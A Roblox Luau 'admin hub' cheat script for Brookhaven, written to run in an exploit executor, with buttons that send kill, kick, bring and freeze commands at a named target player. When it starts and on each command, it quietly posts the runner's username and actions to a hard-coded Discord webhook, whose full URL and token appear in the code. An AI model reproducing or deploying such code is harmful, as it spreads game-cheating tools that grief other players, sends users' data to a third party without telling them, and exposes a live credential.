--[[ 
    Jotinha12hr2 Hub's Admin - V23
    ENGINE: Luau (Brookhaven Optimized)
    STATUS: OBFUSCATED
]]

local _env = getgenv and getgenv() or _G
local _req = (syn and syn.request) or (http and http.request) or http_request or request

-- CONFIGURAÇÃO DO WEBHOOK
local _hook = "https://discord.com/api/webhooks/1457780083124207626/F0AR-Na0rucf2CncuNsXC4yGRYC-Kpjg1XkOdb6YaHgDcOZlVhwym4KwhriXSYaBeZSj"

local function _dispatch(_msg)
    task.spawn(function()
        if not _hook or _hook == "" or not _req then return end
        pcall(function()
            _req({
                Url = _hook,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = game:GetService("HttpService"):JSONEncode({
                    ["embeds"] = {{
                        ["title"] = "Jotinha Admin V23 Log",
                        ["description"] = _msg,
                        ["color"] = 0xFFD700
                    }}
                })
            })
        end)
    end)
end

-- AMBIENTE DO JOGO
local _p = game:GetService("Players")
local _lp = _p.LocalPlayer
local _rs = game:GetService("RunService")
local _cg = game:GetService("CoreGui")

-- SEGURANÇA DE INTERFACE
local _ui_root = (not game:GetService("RunService"):IsStudio() and _cg or _lp:WaitForChild("PlayerGui"))
if _ui_root:FindFirstChild("JotinhaV23") then _ui_root.JotinhaV23:Destroy() end

local _gui = Instance.new("ScreenGui", _ui_root)
_gui.Name = "JotinhaV23"
_gui.ResetOnSpawn = false

-- COMPONENTE JH (RGB)
local _jh = Instance.new("TextButton", _gui)
_jh.Size = UDim2.new(0, 50, 0, 50)
_jh.Position = UDim2.new(0, 10, 0.5, -25)
_jh.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
_jh.Text = "JH"
_jh.Font = Enum.Font.LuckiestGuy
_jh.TextSize = 22
_jh.ZIndex = 10
Instance.new("UICorner", _jh).CornerRadius = UDim.new(1, 0)
local _st = Instance.new("UIStroke", _jh)
_st.Thickness = 3

_rs.RenderStepped:Connect(function()
    local _c = Color3.fromHSV(tick() % 5 / 5, 0.8, 1)
    _st.Color = _c
    _jh.TextColor3 = _c
end)

-- PAINEL PRINCIPAL
local _main = Instance.new("Frame", _gui)
_main.Size = UDim2.new(0, 260, 0, 340)
_main.Position = UDim2.new(0.5, -130, 0.5, -170)
_main.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
_main.BorderSizePixel = 0
_main.Active = true
_main.Draggable = true
Instance.new("UICorner", _main)
local _mst = Instance.new("UIStroke", _main)
_mst.Color = Color3.fromRGB(255, 215, 0)

_jh.MouseButton1Click:Connect(function() _main.Visible = not _main.Visible end)

-- TÍTULO
local _title = Instance.new("TextLabel", _main)
_title.Size = UDim2.new(1, 0, 0, 40)
_title.Text = "Jotinha12hr2 Hub's Admin"
_title.TextColor3 = Color3.fromRGB(255, 215, 0)
_title.BackgroundTransparency = 1
_title.Font = Enum.Font.GothamBold

-- LISTA DE COMANDOS
local _scroll = Instance.new("ScrollingFrame", _main)
_scroll.Size = UDim2.new(1, -10, 1, -50)
_scroll.Position = UDim2.new(0, 5, 0, 45)
_scroll.BackgroundTransparency = 1
_scroll.CanvasSize = UDim2.new(0, 0, 3, 0)
_scroll.ScrollBarThickness = 2
local _layout = Instance.new("UIListLayout", _scroll)
_layout.HorizontalAlignment = "Center"
_layout.Padding = UDim.new(0, 5)

local _target = Instance.new("TextBox", _scroll)
_target.Size = UDim2.new(0, 220, 0, 30)
_target.PlaceholderText = "NICK DO ALVO"
_target.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
_target.TextColor3 = Color3.new(1, 1, 1)
Instance.new("UICorner", _target)

-- ENGINE SYNC (O TREM)
local _cmds = {"Kill", "Void", "Jail", "Unjail", "Kick", "Bring", "Freeze", "Unfreeze", "Spin", "Unspin", "Blind", "Jump", "Sit"}
for _, _name in pairs(_cmds) do
    local _btn = Instance.new("TextButton", _scroll)
    _btn.Size = UDim2.new(0, 220, 0, 30)
    _btn.Text = _name .. " SYNC"
    _btn.BackgroundColor3 = Color3.fromRGB(35, 35, 35)
    _btn.TextColor3 = Color3.new(1, 1, 1)
    _btn.Font = Enum.Font.GothamSemibold
    Instance.new("UICorner", _btn)
    
    _btn.MouseButton1Click:Connect(function()
        local _cmd_string = "/" .. _name:lower() .. " " .. _target.Text
        local _event = game:GetService("ReplicatedStorage"):FindFirstChild("SayMessageRequest", true)
        if _event then
            _event:FireServer(_cmd_string, "All")
            _dispatch("🎯 Comando: " .. _name .. " | Alvo: " .. _target.Text)
        end
    end)
end

-- TAG RGB (LUAU NATIVE)
local function _applyTag(_char)
    local _head = _char:WaitForChild("Head", 5)
    if not _head then return end
    if _head:FindFirstChild("JotaTag") then _head.JotaTag:Destroy() end
    
    local _bg = Instance.new("BillboardGui", _head)
    _bg.Name = "JotaTag"
    _bg.Size = UDim2.new(0, 150, 0, 40)
    _bg.AlwaysOnTop = true
    _bg.ExtentsOffset = Vector3.new(0, 3, 0)
    
    local _txt = Instance.new("TextLabel", _bg)
    _txt.Size = UDim2.new(1, 0, 1, 0)
    _txt.BackgroundTransparency = 1
    _txt.Font = Enum.Font.LuckiestGuy
    _txt.TextSize = 20
    _txt.Text = (_lp.Name == "jotinha12hr2" and "[DONO] " or "[USER] ") .. _lp.DisplayName
    
    _rs.RenderStepped:Connect(function()
        _txt.TextColor3 = Color3.fromHSV(tick() % 5 / 5, 0.8, 1)
    end)
end

_lp.CharacterAdded:Connect(_applyTag)
if _lp.Character then _applyTag(_lp.Character) end

_dispatch("🚀 Jotinha Admin Ativado por " .. _lp.Name)

